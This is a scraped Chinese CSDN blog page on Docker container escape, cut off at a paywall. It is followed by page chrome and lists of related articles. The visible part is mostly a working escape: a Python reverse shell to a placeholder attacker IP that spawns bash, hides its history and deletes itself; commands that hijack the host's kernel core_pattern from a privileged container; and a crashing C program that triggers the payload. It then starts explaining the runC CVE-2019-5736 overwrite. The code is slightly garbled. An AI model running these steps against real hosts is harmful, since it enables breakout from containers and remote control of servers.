Docker容器逃逸_--security-opt apparmor=unconfined,阿里开发7年大牛

最新推荐文章于 2024-05-16 13:34:11 发布
最新推荐文章于 2024-05-16 13:34:11 发布
阅读量298 收藏 3
点赞数 4
分类专栏: 2024年程序员学习 文章标签: docker 容器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60707708/article/details/137393234
版权

import socket
lhost = “IP_ADDRESS”
lport = PORT
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv(“HISTFILE”, ‘/dev/null’)
pty.spawn(“/bin/bash”)

os.remove(‘/tmp/.t.py’)

s.close()
if name == “main”:
main()

chmod 777 /tmp/.x.py
echo -e "|/var/lib/docker/overlay2/5d748dc3bca9db37b2f0d72b2364b4abe4c8b39e878bf1157b407414efae40fe/merged/tmp/.t.py \rcore " > /host/proc/sys/kernel/core_pattern

攻击端机器开启监听。

在容器内创建一段可以崩溃的程序 vim x.c

#include<stdio.h>
int main(void) {
int *a = NULL;
*a = 1;
return 0;
}

编译执行

gcc x.c -o x
./x

0x04 相关程序漏洞导致的容器逃逸

相关程序漏洞指的是参与到容器生态中的服务端、客户端程序自身存在的漏洞。下图展示了操作系统之上的容器及容器集群环境的程序组件。

4.1 CVE-2019-5736:覆盖宿主机上的runC文件

在容器世界中,真正负责创建、修改和销毁容器的组件实际上是容器运行时

当我们执行如docker exec等命令时,底层实际上是容器运行时在操作。例如runC,相应地,runc exec命令会被执行。最终效果是在容器内部执行用户指定的程序。进一步讲,就是在容器的各种命名空间内,受到各种限制(如cgroups)的情况下,启动一个进程。除此以外,这个操作与宿主机上执行一个程序并无二致。

执行过程大体是这样的:runc启动,加入到容器的命名空间,接着以自身(/proc/self/exe)为范本启动一个子进程,最后通过exec系统调用执行用户指定的二进制程序。

  • /proc/[PID]/exe:它是一种特殊的符号链接,又被称为magic links,

指向进程自身对应的本地程序文件 (例如我们执行 ls,/proc/[PID]/exe 就指向 /bin/ls)。它的特殊之处在于,当打开这个文件时,在权限检

最低0.47元/天 解锁文章
m0_60707708
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker学习(十):Docker Compose
BearStarX的博客
02-22 793
一、Docker Compose介绍 1、Compose简介 Docker Compose是Docker官方的编排工具,可以让用户通过编写一个简单的模板文件,快递的创建和管理基于Docker容器的应用集群,负责实现对Docker容器集群进行快速编排。 我们知道使用一个Dockerfile模板文件,可以让用户很方便地定义一个单独的应用容器。然而在日常工作中,经常会碰到需要多个容器相互配合来完成...
Docker容器逃逸_--security-opt apparmor=unconfined,网络相关+网络安全三方库的源码分析+数据结构与算法
code8889的博客
04-03 693
Docker已经将之前容器运行时的Capabilities黑名单机制改成默认禁止所有Capabilities,再以白名单形式赋予容器运行所需的最小权限。
docker run:–security-opt seccomp=unconfined选项解析 (安全计算模式Secure Computing Mode,实现系统调用过滤,禁用或允许某些系统调用)
Dontla的博客
09-18 3856
Seccomp,即安全计算模式,是 Linux 内核的一部分,用于限制进程可以使用的系统调用2。通过禁止或限制对某些系统调用的访问,Seccomp 可以有效减少攻击者能够利用的攻击面。Docker 在默认情况下启用了 Seccomp,并提供了一个默认的配置文件,该文件白名单了大约300个系统调用,其他的则被禁止。这意味着在 Docker 容器中运行的进程只能访问这些已经过滤的系统调用。总的来说,Docker 的选项是一个强大的工具,可以提供更大的灵活性。
Docker容器逃逸_--security-opt apparmor=unconfined(1)
最新发布
2401_84545128的博客
05-16 287
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Docker Security
vito
05-09 3417
https://docs.docker.com/engine/security/security/Docker安全性需要考虑四个方面的因素: 1、linux内核的namespace和cgroup。 2、docker daemon的攻击。 3、容器的配置文件漏洞,默认的或者用户自定义的配置文件。 4、内核的“强化”安全功能,以及它们如何与容器交互。linux内核的namespaceDocker
docker run 命令30个常用参数详解
日拱一卒无有尽,功不唐捐终入海
08-18 1万+
Docker run 命令是在 Docker 中创建和运行容器的主要命令之一。它允许根据需要配置容器的各种属性。下面是docker run命令的一些常见用法和示例,我们共同学习。
Docker容器逃逸_--security-opt apparmor=unconfined,阿里面试100%会问到的网络安全
2401_84165919的博客
04-09 946
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
容器安全技术容器启动安全配置
m0_73803866的博客
10-12 656
那么在 启动容器的时候,同样建议使用该安全选项,通过为 Docker 容器创建或导入 SELinux策略模板,实现其安全防护。容器以进程的形式运行在主机上,运行的容器进程是隔离的,它拥有自己的文件系统、网络以及独立于主机 的进程树。要正确的使用容器,一定要有容器化的思维,正确的认识容器。如果在容器中运行了 SSH、TELNET 等服务,不仅不会增加该微服务的功能,反而会带来一系列的安全威胁 以及增加安全运维的复杂度。中,容器的本质就是 一个或少数进程以及运行进程所需要的各种依赖,即运行时环境的最小集。
Docker容器部署RuoYi-Vue前后端分离项目
06-06
Docker容器部署RuoYi-Vue前后端分离项目 此次部署项目是我亲身经历,而且是一次性部署成功,没有部署超过两次甚至多次的情况,过程虽然很艰难,但结果还是很满意的,我希望大家用心去部署这个项目,你会发现部署这个...
docker-sec:Docker容器的自动AppArmor管理
05-09
泊坞窗 ...要安装docker-sec,首先必须安装并启用AppArmor。 另外,必须在系统中安装auditd。 对于基于Debian的系统,请运行: sudo apt-get install auditd audispd-plugins 下一步,从github克隆doc
docker-compose-linux-x86_64
09-21
Docker-Compose项目是Docker官方的开源项目,负责实现对Docker容器集群的快速编排。 Docker-Compose将所管理的容器分为三层,分别是工程(project),服务(service)以及容器(container)。Docker-Compose运行...
ubuntu 16.04 docker 离线安装包 docker-ce_18.03.1
08-10
ubuntu 16.04 docker 离线安装包 docker-ce_18.03.1 上传到服务器,执行安装命令 # sudo dpkg -i libltdl7_2.4.6-0.1_amd64.deb # sudo dpkg -i libseccomp2_2.3.1-2.1ubuntu2~16.04.1_amd64.deb # sudo dpkg -i ...
docker-ce_18.06.3.ce-1_mips64el
04-01
对应文章:https://blog.csdn.net/SoaringLee_fighting/article/details/120777014 mips平台docker安装包!
Docker之通过资源控制来限制风险
Romanticn_chu的博客
12-16 2332
容器实现的是进程上下文环境的隔离,而不是对整个系统进行虚拟化。通过管控风险可以防止由于软件缺陷而导致的错误行为,也可以防止由于消耗资源过量而导致计算机无响应的攻击类行为。容器可以确保软件仅使用分配的计算资源并且访问受限的数据。 一、设置资源配额 计算机系统的物理资源也是有限的,所以为了解决以上问题,需要隔离进程和有限供应资源。而构建隔离高度隔离的系统的部分工作就包括为各个容器提供资源配额。 (1)内存限制 内存限制是可以对容器的最基本的限制,内存限制规定了容器内的进...
浅谈Docker的安全性支持(上篇)
Spontaneous_0的博客
02-16 405
浅谈Docker的安全性支持(上篇)
2.1 docker 启动容器的时候可以使用的一些选项 和配置
xiaoliuliu2050的专栏
12-03 7350
docker守护进程的配置和操作模式: docker -d [OPTIONS] -d 以后台方式运行容器。 下面是容器创建时的一些配置,按需添加。初学者可以简单看看,以后需要再来查找。 运行相关: -D, --debug=false -e,--exec-driver="native" -p,--pidfile="/var/run/docker.pid" 服务器相关
docker命令行大全详解(更新中)
热门推荐
talkxin的博客
10-16 2万+
本文是基于docker v18.03 稳定版基础来整理翻译 docker命令集 命令 说明 容器生命周期管理 run 运行镜像 容器操作 容器文件系统操作 镜像仓库操作 镜像管理 其他命令 run命令 dockerd命令集 ...
Docker 生产环境之安全性 - 适用于 Docker 的 Seccomp 安全配置文件
kikajack的博客
03-17 5454
原文地址安全计算模式(secure computing mode,seccomp)是 Linux 内核功能。可以使用它来限制容器内可用的操作。seccomp() 系统调用在调用进程的 seccomp 状态下运行。可以使用此功能来限制你的应用程序的访问权限。只有在使用 seccomp 构建 Docker 并且内核配置了 CONFIG_SECCOMP 的情况下,此功能才可用。要检查你的内核是否支持 se
Docker安全性(二)——带来了新的安全功能给Docker
每一天都有新的希望
12-03 7583
Docker安全性(二)——带来了新的安全功能给Docker Docker,红帽和开源社区正在共同努力,使Docker更安全。当我看到安全容器中,我期待防止容器内的进程主机,我也期待来保护彼此的容器。与Docker,我们使用的是分 层的安全方法,这是“结合多个缓解安全控制,以保护资源和数据的做法。” 基本上,我们希望把尽可能多的安全屏障,尽可能防止爆发。如果特权进程可以突破的一个容纳机制,我们希望下一个阻止他们。与Docker,我们要采取的Linux尽可能多的 安全机制的优势。
docker run -it --name=centos7 -v my-vol:/opt centos:7 bash解析
08-26
docker run -it --name=centos7 -v my-vol:/opt centos:7 bash表示使用Docker运行一个基于CentOS 7基础镜像的容器,并且通过bind mount的方式将主机上的my-vol目录挂载到容器内的/opt目录上。 - `-it`参数是告诉...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值